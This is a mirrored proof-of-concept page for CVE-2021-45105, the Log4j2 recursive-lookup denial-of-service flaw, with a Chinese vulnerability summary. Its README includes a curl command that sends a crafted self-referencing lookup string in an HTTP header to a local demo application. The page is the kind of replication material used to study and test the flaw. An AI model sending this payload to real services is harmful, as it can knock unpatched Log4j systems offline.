Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-45105 PoC — Apache Log4j 安全漏洞

Source
https://github.com/tejas-nagchandi/CVE-2021-45105
Associated Vulnerability
Title:Apache Log4j 安全漏洞 (CVE-2021-45105)
Description:Apache Log4j是美国阿帕奇(Apache)基金会的一款基于Java的开源日志记录工具。 Apache Log4j2 2.0-alpha1到2.16.0版本(不包括2.12.3)存在安全漏洞,该漏洞源于自引用查找的不受控递归。攻击者可利用该漏洞在解释精心编制的字符串时导致拒绝服务。此问题已在2.17.0 和 2.12.3中修复。
Description
Replicating CVE-2021-45105
Readme
# tejas-nagchandi/CVE-2021-45105
Replicating CVE-2021-45105

## API
```
curl -I localhost:8080/currentDateTime -H 'Time-Zone: GMT'
```
Output:

![image](https://user-images.githubusercontent.com/76960497/146695238-6723adf4-a46e-492e-af7e-1e56c76c3882.png)

## Attack
```
 curl -I localhost:8080/currentDateTime -H 'Time-Zone: ${${::-${::-$${::-$}}}}'
```
Output:

![image](https://user-images.githubusercontent.com/76960497/146695252-05a3b4aa-71f9-48f9-a8d0-757dc2e65bd0.png)

Logs:

![image](https://user-images.githubusercontent.com/76960497/146694904-173ade2d-3036-45ce-88fd-22d815de93c8.png)

## Reference:
* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105
File Snapshot

 [4.0K]  /data/pocs/5f710f6708f5b850b15e859d120b91ef842576f4
├── [3.4K]  pom.xml
├── [ 675]  README.md
└── [4.0K]  src
    ├── [4.0K]  main
    │   ├── [4.0K]  java
    │   │   └── [4.0K]  com
    │   │       └── [4.0K]  vulnerability
    │   │           ├── [ 324]  Cve202145105Application.java
    │   │           └── [1.6K]  MainController.java
    │   └── [4.0K]  resources
    │       └── [ 485]  log4j2.xml
    └── [4.0K]  test
        └── [4.0K]  java
            └── [4.0K]  com
                └── [4.0K]  vulnerability
                    └── [1.8K]  MainControllerTest.java

10 directories, 6 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.